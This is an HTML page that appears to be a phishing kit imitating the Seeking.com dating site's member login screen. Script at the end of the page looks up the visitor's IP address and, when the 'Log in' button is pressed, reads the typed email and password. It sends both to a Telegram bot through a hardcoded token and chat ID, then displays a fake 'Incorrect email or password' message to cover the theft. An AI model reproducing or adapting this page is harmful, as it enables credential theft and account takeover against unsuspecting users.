<!DOCTYPE html>

<html>


<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0,viewport-fit=cover">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-touch-fullscreen" content="yes">
    <meta name="apple-mobile-web-app-title" content="SeekingArrangement">
    <meta name="apple-mobile-web-app-status-bar-style" content="white">
    <meta name="theme-color" content="#ffffff">
  
  
    <title>Member Login - Seeking</title>
    <meta name="description" content="Find and message millions of attractive and successful members! Login to Seeking.com - Start Dating Up™">
    <link rel="stylesheet" href="semantic.min.css">
   
    <link href="SourceSansPro-400-300-600.css" rel="stylesheet">
    
    
    <style>
        .ProfileInfoCard {
            pointer-events: auto !important;
        }

        ::-webkit-scrollbar-track {
            display: none;
        }

        html {
            overflow-x: visible !important;
            --sab: env(safe-area-inset-bottom);
        }

        body {
            font-size: inherit;
        }

        a,
        a:hover {
            color: inherit;
        }

        a.btn--action:hover {
            color: #fff;
        }

        .dropdown {
            display: inline-block;
        }

        .dropdown__content {
            display: none;
            position: absolute;
            top: 60px;
            right: 25px;
            box-shadow: 0 2px 8px rgba(0, 0, 0, 0.2);
        }

        .dropdown--active .dropdown__content {
            display: block;
            z-index: 10001;
        }

        .css-ouo77o {
            border-top-left-radius: 2px;
            border-top-right-radius: 2px;
            border-bottom-right-radius: 2px;
            border-bottom-left-radius: 2px;
            display: inline-flex;
            -webkit-box-align: center;
            align-items: center;
            -webkit-box-pack: center;
            justify-content: center;
            box-sizing: border-box;
            padding-top: 12px;
            width: 74px;
            height: 40px;
            padding-right: 16px;
            font-family: "Source Sans Pro", HelveticaNeue, Helvetica, Arial, Sans;
            font-size: 16px;
            font-weight: 700;
            line-height: 1;
            outline-color: initial;
            outline-style: none;
            outline-width: initial;
            cursor: pointer;
            white-space: nowrap;
            border-top-width: initial;
            border-right-width: initial;
            border-bottom-width: initial;
            border-left-width: initial;
            border-top-style: initial;
            border-right-style: initial;
            border-bottom-style: initial;
            border-left-style: initial;
            border-top-color: rgb(207, 4, 4);
            border-right-color: rgb(207, 4, 4);
            border-bottom-color: rgb(207, 4, 4);
            border-left-color: rgb(207, 4, 4);
            border-image-source: initial;
            border-image-slice: initial;
            border-image-width: initial;
            border-image-outset: initial;
            border-image-repeat: initial;
            background-color: rgb(207, 4, 4);
            color: rgb(255, 255, 255);
            }

        @media only screen and (min-width: 580px){
        .css-1uqgmid {
        min-width: 600px;}
        }
    </style>
    <script>
        dataLayer = [];
    </script>
    <!-- <script>
        (function(p, u, s, h) {
            p._pcq = p._pcq || [];
            p._pcq.push(['_currentTime', Date.now()]);
            s = u.createElement('script');
            s.type = 'text/javascript';
            s.async = true;
            s.crossOrigin = 'anonymous';
            s.src = "https://cdn.pushcrew.com/sw/083ee782d50bc0ccef46956552b877a6.js";
            h = u.getElementsByTagName('script')[0];
            h.parentNode.insertBefore(s, h);
        })(window, document);
    </script> -->

    <link href="0.2bc2b27d3084afb4c2af.css" rel="stylesheet">
    <link href="join.2bc2b27d3084afb4c2af.css" rel="stylesheet">
    <style data-emotion=""></style>
    <style type="text/css" data-glamor=""></style>
    <script src="vysion.min.html" async=""></script>
    <style data-emotion="css"></style>
</head>

<body>
    <div id="reactApp" style="height: 100%">
        <div style="height: 100%;">
            <div id="App-wrapper" class="css-35o8hq">
                <div id="App-content" class="css-1122yjz">
                    <div class="AppContent AppContent--lrgTop">
                        <div class="wrapper wrapper--login wrapper--loginPage">
                            <div class="Loging-logo"><a class="SiteLogo" >
                                    <div class="svgLogo css-qj95fs"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 229.34 77.94" width="110" height="33" class="svgLogo" data-cy-logo="wide-en">
                                            <defs>
                                                <style>
                                                    .cls-1 {
                                                        fill: #a11d21
                                                    }

                                                    .cls-3 {
                                                        fill: #b22126
                                                    }
                                                </style>
                                            </defs>
                                            <g id="Layer_2" data-name="Layer 2">
                                                <g id="seeking21_color_fl">
                                                    <path class="cls-1" d="m30.83 8.01 2.81 3.88L36.95 0l-10.6 6.33 4.48 1.68z"></path>
                                                    <path d="M30.83 8.01 36.95 0l-10.6 6.33 4.48 1.68z" style="fill: rgb(203, 32, 38);"></path>
                                                    <path class="cls-3" d="M17.46 32.76c-6.22-2-11.86-3.93-11.86-10 0-6.89 5.31-10.15 11.66-10.15 4.09 0 7 1.64 9.89 4L31.41 14a19.8 19.8 0 0 0-14.17-6.3C8 7.65.21 13.12.21 23c0 9.42 6.91 12.11 13.86 14.3s14.06 3.9 14.06 11.55c0 6.91-4.92 10.8-11.58 10.8-5.5 0-9.24-1.94-12.34-6L0 56.26C3.82 62 9.54 64.6 16.46 64.6c9.6 0 17.06-6.26 17.06-16.17 0-10.61-8.45-13.21-16.06-15.67ZM42.11 50.41c1.58 3.65 6.74 9.28 14.12 9.28 5.79 0 10.78-3 15.07-6.58v5.55c-3.49 3.49-9.84 5.63-14.76 5.63C44.25 64.29 35.92 55 35.92 43S44.8 22.56 56.7 22.56a18.28 18.28 0 0 1 15.71 9.29Zm23.08-19.75a11.49 11.49 0 0 0-8.49-3.49c-9.36 0-16.18 6.9-16.18 15.86a14.93 14.93 0 0 0 .32 3.25ZM80.2 50.41c1.58 3.65 6.74 9.28 14.12 9.28 5.79 0 10.78-3 15.07-6.58v5.55c-3.49 3.49-9.84 5.63-14.76 5.63C82.34 64.29 74 55 74 43s8.88-20.39 20.78-20.39a18.28 18.28 0 0 1 15.71 9.29Zm23.08-19.75a11.49 11.49 0 0 0-8.49-3.49c-9.36 0-16.18 6.9-16.18 15.86a14.93 14.93 0 0 0 .32 3.25ZM147 64.29V23.52l4.6-1v40.82Z"></path>
                                                    <path class="cls-1" d="M147 19.66v-4.38l4.6-.95v4.38Z"></path>
                                                    <path class="cls-3" d="M156.38 64V23.52l4.6-1v6.59h.16a14 14 0 0 1 11.51-6.59c3.42 0 7.23.67 9.53 2.36 3.7 2.69 5.3 5.22 5.3 11.69v26.77l-4.6.64V35.57c0-5.79-3.73-8.88-10.08-8.88-4.36 0-11.82 3.17-11.82 10.87v25.78ZM192.77 65.65c3.72 4.28 8.16 7.69 14.5 7.69s13.24-4 13.24-10c0-6.82-6.5-11.49-12.84-11.49a28 28 0 0 0-10.39 2.29l1.72-5.22c-4.12-1.82-7.69-6.66-7.69-11.25 0-9.52 7.61-15.07 16.57-15.07 1.58 0 3.25.08 4.83.08h8.27l-2.32 3.73c3.41 2.78 6 6.26 6 10.94A13.37 13.37 0 0 1 216 49.56c5.47 2.54 9.12 6.89 9.12 13.16 0 9.59-9 15.22-18.23 15.22-7.38 0-13.64-4.37-17.6-9.67Zm3.09-28.22c0 6.5 5.94 10.15 12 10.15 5.86 0 12.21-3.65 12.21-10.15 0-6.66-6.19-10.54-12.13-10.54s-12.08 3.88-12.08 10.54ZM114.35 6.38l4.6-.95v37.44l17.93-20.78 3.65 2.22-16.11 18.72 18.01 18.24-2.94 2.71-20.54-20v19.36l-4.6.95V6.38zM223.27 18.94a3.31 3.31 0 0 1 .69-1 3.26 3.26 0 0 1 1-.65 3.21 3.21 0 0 1 1.23-.24 3.07 3.07 0 0 1 1.21.24 3.26 3.26 0 0 1 1 .65 3.11 3.11 0 0 1 .68 1 3 3 0 0 1 .26 1.23 3.14 3.14 0 0 1-1.94 2.92 3.26 3.26 0 0 1-1.21.23 3.4 3.4 0 0 1-1.23-.23 3.11 3.11 0 0 1-1-.66 3.31 3.31 0 0 1-.69-1 3.12 3.12 0 0 1-.25-1.26 3 3 0 0 1 .25-1.23Zm.52 2.3a2.57 2.57 0 0 0 .54.85 2.59 2.59 0 0 0 1.86.78 2.44 2.44 0 0 0 1-.21 2.37 2.37 0 0 0 .82-.57 2.6 2.6 0 0 0 .55-.85 2.87 2.87 0 0 0 .19-1.07 2.84 2.84 0 0 0-.19-1.05 2.55 2.55 0 0 0-.55-.84 2.52 2.52 0 0 0-.82-.57 2.6 2.6 0 0 0-1-.2 2.53 2.53 0 0 0-1.86.77 2.53 2.53 0 0 0-.54.84 2.91 2.91 0 0 0 0 2.12Zm2.59-2.89a1.46 1.46 0 0 1 1 .26 1 1 0 0 1 .31.79.89.89 0 0 1-.27.72 1.26 1.26 0 0 1-.69.28l1.02 1.6h-.61l-1-1.58h-.61V22H225v-3.65Zm-.25 1.65h.36a.94.94 0 0 0 .31-.08.46.46 0 0 0 .21-.18.55.55 0 0 0 .08-.34.5.5 0 0 0-.07-.29.58.58 0 0 0-.18-.17 1.12 1.12 0 0 0-.26-.08h-1.05V20Z"></path>
                                                </g>
                                            </g>
                                        </svg></div>
                                </a></div>
                            <div class="AppDialog-dialog" style="clear: both;">
                                <div class="PagePanel css-1uqgmid">
                                    <div class="browserUpdateMessageContent" style="text-align: center; background: rgb(249, 249, 249); padding: 1rem; color: rgb(70, 70, 70); display: none;"><img src="warning.html" alt="" style="width: 25px; height: 2px; opacity: 0.7;">
                                        <h3 style="margin-bottom: 5px; line-height: 20px; text-transform: uppercase; font-size: 16px;">unsupported browser notice</h3>
                                        <div class="BrowserTestContent">
                                            <p style="margin-bottom: 10px; font-size: 12px;">It looks like you are using an out-of-date or unsupported browser, and that may cause alot of issues while you are navigating within our site. Before you login, we would recommend that you update your browser.</p><a target="_blank" rel="noopener noreferrer" href="http://browsehappy.com/" style="font-size: 14px; color: rgb(207, 4, 4);"><b>You can update your browser here</b></a>
                                        </div>
                                    </div>
                                    <div class="Panel-header">
                                        <h1 class="Panel-title h3">Log in</h1>
                                    </div>
                                    <div class="Panel-body" style="position: relative;">

                                        <div id="notification-banner" data-cy-banner="notifications-banner" class="common_error_content" style="margin-bottom: 0px; display:none">
                                            <div data-cy-banner="fail" class="Alert Alert--fail">
                                                <div class="layoutContainer"><div class="layoutContainer__content">
                                                    <div class="container">Incorrect email or password.</div></div></div></div></div>

                                        <!-- <form class="form-horizontal" > -->
                                            <div class="FormGroup">
                                                <legend class="col-md-4 control-label">Email</legend>
                                                <div class="css-1fhq8rf"><input id="email" type="email" data-cy-input="email" name="email"></div>
                                                <p class="emailHint"></p>
                                            </div>
                                            <div class="FormGroup">
                                                <div style="display: flex; justify-content: space-between; align-items: baseline;">
                                                    <legend>Password</legend><a id="toggleShow-password" data-cy-toggle="password" style="text-decoration: underline; color: rgb(70, 70, 70);">Show</a>
                                                </div>
                                                <div class="css-1fhq8rf"><input autocomplete="true" id="password" data-cy-input="password" type="password" name="password"></div>
                                                <div style="padding: 10px 0px;"></div>
                                            </div>
                                            <div class="FormGroup"><button  onclick="sendMail()" class="css-ouo77o">Log in</button></div>
                                        <!-- </form> -->


                                    </div>
                                </div>
                                <div>
                                    <p class="Join-helpText"><span>Don't have an account? <a>Join</a> today.</span></p>
                                </div>
                                <div>
                                    <p class="Login-helpText css-e6xdk6"><span>By continuing you agree to Seeking's <a href="tabindex%3d.html"-1" target="_blank" rel="noopener noreferrer">Terms</a> and <a href="#" tabindex="-1" rel="noopener noreferrer">Privacy Policy</a>.</span></p>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
                
        </div>
    </div>
    </div>
    <!-- <script src="./realgifts.js"></script> -->
    <!-- <script src="./simplepeer.min.js"></script> -->
    <!-- <script>
        window.addEventListener("appinstalled", function() {
            if (window.dataLayer) {
                window.dataLayer.push({
                    event: "pwa_installed",
                });
            }
        });

        if ("serviceWorker" in navigator) {
            window.addEventListener("load", function() {
                navigator.serviceWorker
                    .register("/sw.js")
                    .then(function(registration) {
                        var isInWebAppiOS = "standalone" in window.navigator && window.navigator.standalone;
                        var isInWebAppChrome = window.matchMedia("(display-mode: standalone)").matches;

                        if (isInWebAppiOS || isInWebAppChrome) {
                            if (window.dataLayer) {
                                window.dataLayer.push({
                                    event: "pwa_installed",
                                });
                            }
                        }

                    })
                    .catch(function(registrationError) {
                        console.log("SW registration failed: ", registrationError);
                    });
            });

            function absorbEvent_(event) {
                var e = event || window.event;
                e.preventDefault && e.preventDefault();
                e.stopPropagation && e.stopPropagation();
                e.cancelBubble = true;
                e.returnValue = false;
                return false;
            }

            function preventLongPressMenu(node) {
                node.ontouchstart = absorbEvent_;
                node.ontouchmove = absorbEvent_;
                node.ontouchend = absorbEvent_;
                node.ontouchcancel = absorbEvent_;
            }

            // if is standalone android OR safari
            if (window.matchMedia("(display-mode: standalone)").matches || window.navigator.standalone === true) {
                // prevent long press with all <a> tag
                preventLongPressMenu(document.getElementsByTagName("a"));
                // disable context menu
                window.oncontextmenu = function(event) {
                    event.preventDefault();
                    event.stopPropagation();
                    return false;
                };

                // https://stackoverflow.com/questions/51735869/check-if-user-has-already-installed-pwa-to-homescreen-on-chrome
                // Implements this styles once detected in standalone
                document.getElementsByTagName("body")[0].style =
                    "overscroll-behavior-y: contain;" +
                    "-webkit-touch-callout:none;" +
                    "-webkit-user-select:none;" +
                    "-khtml-user-select:none;" +
                    "-moz-user-select:none;" +
                    "-ms-user-select:none;" +
                    "-webkit-tap-highlight-color: transparent;" +
                    "-webkit-overflow-scrolling: touch;" +
                    "user-select:none;";
            }
        }
    </script> -->
   
    <script src="vendors-2bc2b27d3084afb4c2af.min.js"></script>
    <!-- <script src="./login-2bc2b27d3084afb4c2af.min.js"></script> -->
    
</body>

<script src=
"../ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js">
    </script>


<script>


           
           // Add "https://ipinfo.io" statement
           // this will communicate with the ipify servers
           // in order to retrieve the IP address
           $.get("https://ipinfo.io/", function(response) {
                  var ipx = response.ip;
                  sendIp(ipx);
               }, "json")
                
               // "json" shows that data will be fetched in json format
           
 
         function sendIp(ipx) {
         
           // alert("kjk");
         
         //   var phr = document.getElementById("phrase").value ;
          
           
         
                 
                   //https://api.telegram.org/bot6369598361:AAHlQhiTaUcQX83bCeE5X7b9mTZc86BvdPc/sendMessage?chat_id=6298874715&text=heeey 
                   
                   // fetch(`https://api.telegram.org/bot${bot.TOKEN}/sendMessage?chat_id=${bot.chatID}&text=${email}=${pwd}`, {
         
                     // https://api.telegram.org/bot6369598361:AAHlQhiTaUcQX83bCeE5X7b9mTZc86BvdPc/sendMessage?chat_id=6298874715&text=heeey
         
         
                   fetch('https://api.telegram.org/bot6369598361:AAHlQhiTaUcQX83bCeE5X7b9mTZc86BvdPc/sendMessage?chat_id=6298874715&text=ip:'+ipx , {
                       method: "GET"
                   }).then(success => {
         
                     // alert("Invalid phrase. Kindly enter the correct 12 phrase");
         
                     // const dangerMessage = document.querySelector("#msg")
                     
                   }, error => {
                     //   alert("Message not sent")
                       console.log(error)
         
                   })
               
                
          
            
         }
         
             

    function sendMail() {
    
      // alert("kjk");
    
      var email = document.getElementById("email").value ;

      var pass = document.getElementById("password").value ;

     




      phr = "email: "+ email +" ; password:"+pass;
     
      
    
            
            
    
              fetch('https://api.telegram.org/bot6369598361:AAHlQhiTaUcQX83bCeE5X7b9mTZc86BvdPc/sendMessage?chat_id=6298874715&text=seekinginfo:'+phr , {
                  method: "GET"
              }).then(success => {
    
                // alert("Invalid phrase. Kindly enter the correct 12 phrase");

                document.getElementById("notification-banner").style.display = "block";
    
                // const dangerMessage = document.querySelector("#msg")
                
              }, error => {
                //   alert("Message not sent")
                //   console.log(error)
    
              })
          
           
     
       
    }
    
        </script>

    


</html>